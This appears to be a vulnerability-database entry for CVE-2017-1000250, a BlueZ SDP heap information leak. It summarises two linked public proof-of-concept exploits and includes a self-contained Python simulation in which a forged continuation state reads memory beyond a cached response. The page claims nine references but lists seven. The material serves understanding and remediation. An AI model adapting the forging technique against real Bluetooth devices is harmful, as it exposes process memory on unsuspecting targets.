CVE-2017-1000250

MEDIUM

BlueZ <= 5.46 - Exposure of Sensitive Information via SDP Search Attribute Request

Title source: llm

Exploitation Summary

EIP tracks 2 public exploits for CVE-2017-1000250. PoCs published by Miracle963 and olav-st.

AI-analyzed exploit summary: Both tracked PoCs are Python scripts that speak SDP to the target's bluetoothd over an L2CAP connection, with no pairing or other authentication required, and abuse the handling of the continuation state in SDP search attribute requests. A tampered continuation state makes the server return bytes from outside the response it cached, that is, bluetoothd heap memory, to the remote attacker.

Description

All versions of the SDP server in BlueZ 5.46 and earlier are vulnerable to an information disclosure vulnerability which allows remote attackers to obtain sensitive information from the bluetoothd process memory. This vulnerability lies in the processing of SDP search attribute requests, specifically in the continuation state that lets a client fetch a response too large for one PDU in several pieces: the state a client sends back is not sufficiently validated before it is used to locate the next piece of the cached response.
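The continuation-state mechanism the description refers to, as an added example in Python (the language of both tracked PoCs) that is not code from this page, from BlueZ or from either repository: a client builds SDP_SVC_SEARCH_ATTR_REQ PDUs per the Bluetooth Core Specification and talks to an in-process toy server that stands in for bluetoothd (the real PoCs reach it over an L2CAP socket). The 6-byte continuation state layout, the fake heap and the "secret" bytes are constructed assumptions, and the unchecked path models the class of defect (a client-controlled offset into a cached response used without a bound check), not BlueZ's exact code. `fetch_all` follows continuation states legitimately; `forge_and_read` then reuses the server-issued timestamp with an offset past the cached response. The unchecked server returns bytes from beyond the response, the checked one answers with an Invalid Continuation State error.

```python
"""Toy model of SDP search-attribute requests and continuation-state handling.

Added example; not code from this page, BlueZ, or either tracked PoC. PDU IDs
(0x01/0x06/0x07), data-element headers and error code 0x0005 follow the
Bluetooth Core Specification's SDP chapter. Constructed assumptions: the 6-byte
continuation state (4-byte timestamp + 2-byte byte offset), the fake heap, and
the in-process server that replaces bluetoothd behind an L2CAP socket.
"""
import struct

SDP_ERROR_RSP, SDP_SVC_SEARCH_ATTR_REQ, SDP_SVC_SEARCH_ATTR_RSP = 0x01, 0x06, 0x07
SDP_INVALID_CSTATE = 0x0005          # spec error code: invalid continuation state
PUBLIC_BROWSE_GROUP = 0x1002
SECRET = b"constructed-secret-heap-bytes"   # stands in for whatever follows the cache


def des(*elems):
    """Data Element Sequence, type 6 with a one-byte length (header byte 0x35)."""
    body = b"".join(elems)
    return bytes([0x35, len(body)]) + body


def uuid16(v):            # type 3 (UUID), size index 1 -> 2 bytes
    return b"\x19" + struct.pack(">H", v)


def attr_range(lo, hi):   # type 1 (unsigned int), size index 2 -> 4 bytes
    return b"\x0a" + struct.pack(">HH", lo, hi)


def build_req(tid, max_bytes, cstate=b""):
    """SDP_SVC_SEARCH_ATTR_REQ: search pattern, MaximumAttributeByteCount, attr IDs, cstate."""
    params = (des(uuid16(PUBLIC_BROWSE_GROUP)) + struct.pack(">H", max_bytes)
              + des(attr_range(0x0000, 0xFFFF)) + bytes([len(cstate)]) + cstate)
    return struct.pack(">BHH", SDP_SVC_SEARCH_ATTR_REQ, tid, len(params)) + params


def parse_req(pdu):
    _, tid, plen = struct.unpack_from(">BHH", pdu)
    p = pdu[5:5 + plen]
    pos = 2 + p[1]                                  # skip ServiceSearchPattern DES
    max_bytes = struct.unpack_from(">H", p, pos)[0]
    pos += 2
    pos += 2 + p[pos + 1]                           # skip AttributeIDList DES
    return tid, max_bytes, p[pos + 1:pos + 1 + p[pos]]


def parse_rsp(pdu):
    """Returns (pdu_id, attribute bytes, continuation state); error PDUs carry no data."""
    pdu_id, _, plen = struct.unpack_from(">BHH", pdu)
    p = pdu[5:5 + plen]
    if pdu_id == SDP_ERROR_RSP:
        return pdu_id, b"", b""
    n = struct.unpack_from(">H", p)[0]
    return pdu_id, p[2:2 + n], p[3 + n:3 + n + p[2 + n]]


class SdpServer:
    """checked=False models the missing bound check; checked=True the corrected logic."""
    TIMESTAMP = 0x5A5A0001        # constant for the demo; a real server derives it from time

    def __init__(self, checked):
        self.checked = checked
        record = (b"\x09" + struct.pack(">H", 0x0000) + b"\x0a" + struct.pack(">I", 0x10000)
                  + b"\x09" + struct.pack(">H", 0x0001) + des(uuid16(0x1101)))
        self.cached = des(des(record))                     # the response the server caches
        self.heap = self.cached + b"\x00" * 4 + SECRET     # cache followed by other process data

    def handle(self, req):
        tid, max_bytes, cstate = parse_req(req)
        offset = 0
        if cstate:
            if len(cstate) != 6:
                return struct.pack(">BHHH", SDP_ERROR_RSP, tid, 2, SDP_INVALID_CSTATE)
            ts, offset = struct.unpack(">IH", cstate)
            if ts != self.TIMESTAMP or (self.checked and offset >= len(self.cached)):
                return struct.pack(">BHHH", SDP_ERROR_RSP, tid, 2, SDP_INVALID_CSTATE)
        # Unchecked path: 16-bit arithmetic wraps when the client-supplied offset is past
        # the end, so the copy length becomes max_bytes and the read starts beyond the
        # cached buffer. (Slicing stops at the end of the fake heap; memcpy would not.)
        remaining = (len(self.cached) - offset) & 0xFFFF
        chunk = self.heap[offset:offset + min(max_bytes, remaining)]
        new_offset = offset + len(chunk)
        nxt = struct.pack(">IH", self.TIMESTAMP, new_offset) if new_offset < len(self.cached) else b""
        params = struct.pack(">H", len(chunk)) + chunk + bytes([len(nxt)]) + nxt
        return struct.pack(">BHH", SDP_SVC_SEARCH_ATTR_RSP, tid, len(params)) + params


def fetch_all(server, max_bytes=8):
    """Legitimate client: follow continuation states until the response is complete."""
    data, cstate, last, tid = b"", b"", b"", 1
    while True:
        _, chunk, cstate = parse_rsp(server.handle(build_req(tid, max_bytes, cstate)))
        data, tid = data + chunk, tid + 1
        if not cstate:
            return data, last
        last = cstate


def forge_and_read(server, leak_max=64):
    """Reuse a server-issued timestamp but point the offset past the cached response."""
    full, cstate = fetch_all(server)
    ts, _ = struct.unpack(">IH", cstate)
    forged = struct.pack(">IH", ts, len(full) + 1)
    pdu_id, data, _ = parse_rsp(server.handle(build_req(99, leak_max, forged)))
    return pdu_id, data


if __name__ == "__main__":
    print("unchecked:", forge_and_read(SdpServer(checked=False)))
    print("checked:  ", forge_and_read(SdpServer(checked=True)))
```

Running the script prints both outcomes. The server side is where the defect belongs and where it is fixed: validate the continuation state's length, origin and offset before it is used, and clamp the copy length to what remains of the cached response; a client-supplied MaximumAttributeByteCount must never decide how much is copied on its own.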

Exploits (2)

github WORKING POC 38 stars
by Miracle963 · python · poc
https://github.com/Miracle963/bluetooth-cve/tree/master/littl_tools/CVE-2017-1000250

A functional Python PoC that connects to the target over L2CAP and sends crafted SDP search attribute requests; by tampering with the continuation state the server hands back, it makes bluetoothd return heap data from beyond the cached response, remotely leaking memory from the Linux Bluetooth stack.

Classification
Working PoC (95% confidence)
Attack Type
Info Leak
Complexity
Moderate
Reliability
Reliable
Target: Linux Bluetooth stack (BlueZ)
No auth needed
Prerequisites: Bluetooth enabled on target · Target device must be within Bluetooth range · L2CAP socket access on attacker's machine
devstral-2 · analyzed Feb 27, 2026
nomisec WORKING POC 5 stars
by olav-st · poc
https://github.com/olav-st/CVE-2017-1000250-PoC

A functional Python PoC that reaches the target's BlueZ SDP server over L2CAP and forges the continuation state in follow-up search attribute requests, so that the server returns process memory located past the response it cached; the dumped bytes demonstrate the information leak.

Classification
Working PoC (95% confidence)
Attack Type
Info Leak
Complexity
Moderate
Reliability
Reliable
Target: BlueZ (Linux Bluetooth stack)
No auth needed
Prerequisites: Bluetooth connectivity to the target · Target must have BlueZ with the vulnerable version
devstral-2 · analyzed Feb 18, 2026

References (9)

Core References
Exploit, Technical Description, Third Party Advisory (Armis BlueBorne)
https://www.armis.com/blueborne
Third Party Advisory (Debian DSA-3972)
http://www.debian.org/security/2017/dsa-3972
Third Party Advisory, VDB Entry (SecurityFocus BID 100814)
http://www.securityfocus.com/bid/100814
Vendor Advisory (NVIDIA)
http://nvidia.custhelp.com/app/answers/detail/a_id/4561
Third Party Advisory, US Government Resource (CERT/CC VU#240311)
https://www.kb.cert.org/vuls/id/240311
Vendor Advisory (Red Hat RHSA-2017:2685)
https://access.redhat.com/errata/RHSA-2017:2685
Issue Tracking, Third Party Advisory, VDB Entry (Red Hat CVE page)
https://access.redhat.com/security/cve/CVE-2017-1000250

Scores

CVSS v3 6.5
EPSS 0.0777
EPSS Percentile 93.9%
Attack Vector ADJACENT_NETWORK
CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Details

CWE
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)
Status published
Products (1)
bluez/bluez <= 5.46
Published Sep 12, 2017
Tracked Since Feb 18, 2026